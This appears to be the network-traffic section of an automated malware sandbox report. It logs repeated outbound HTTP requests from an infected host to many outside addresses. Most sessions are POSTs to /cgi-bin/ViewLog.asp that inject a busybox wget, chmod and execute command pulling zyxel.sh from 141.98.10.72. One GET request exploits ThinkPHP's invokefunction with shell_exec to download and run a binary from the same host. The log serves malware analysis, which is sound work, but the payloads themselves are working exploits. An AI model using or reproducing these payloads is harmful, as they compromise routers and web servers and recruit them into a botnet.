                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:20.214978933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:03.222079039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      753192.168.2.156020631.136.140.1628080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.503698111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:37.176215887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.520225048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:41.304173946 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:46.679863930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.431593895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:20.214975119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:03.222055912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      754192.168.2.154461695.34.204.68080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.510596037 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:36.816914082 CET1286INHTTP/1.1 401 Unauthorized
                                                      Date: Wed, 14 Feb 2024 06:55:58 GMT
                                                      WWW-Authenticate: Digest realm="sharedLogic", domain="", nonce="Hpxmpo0BAAAoKRjyZql8+lCLigPjn6ua", algorithm=MD5, qop="auth"
                                                      Cache-Control: must-revalidate,no-cache,no-store
                                                      Content-Type: text/html;charset=ISO-8859-1
                                                      Content-Length: 1292
                                                      Server: Jetty(8.1.14.v20131031)
                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 3a 20 34 30 31 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 70 72 65 3e 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a
                                                      Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 401 Unauthorized</title></head><body><h2>HTTP ERROR: 401</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Unauthorized</pre></p><hr /><i><small>Powered by Jetty://</small></i>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      755192.168.2.154684495.168.248.1658080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.524635077 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:36.749803066 CET140INHTTP/1.1 403 Forbidden
                                                      Content-Type: text/html;charset=UTF-8
                                                      Content-Length: 0
                                                      Connection: close
                                                      Cache-control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      756192.168.2.154383095.214.235.118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.530667067 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      757192.168.2.155087894.121.53.448080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.546752930 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      758192.168.2.154551894.121.216.938080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.555936098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      759192.168.2.155048494.122.67.1358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.557621956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      760192.168.2.153952494.120.246.228080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.559815884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      761192.168.2.154835495.86.115.1908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.561788082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      762192.168.2.153817695.51.116.1298080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.596601009 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      763192.168.2.154687895.168.248.1658080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.975956917 CET140INHTTP/1.1 403 Forbidden
                                                      Content-Type: text/html;charset=UTF-8
                                                      Content-Length: 0
                                                      Connection: close
                                                      Cache-control: no-cache


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      764192.168.2.1545418112.83.36.6280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:36.980155945 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:37.323183060 CET1286INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:37 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 2813
                                                      Connection: close
                                                      x-ws-request-id: 65cc7a2d_xian62_13217-6361
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 57 65 64 2c 20 31 34 20 46 65 62 20 32 30 32 34 20 30 38 3a 33 30 3a 33 37 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 78 69 61 6e 36 32 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20
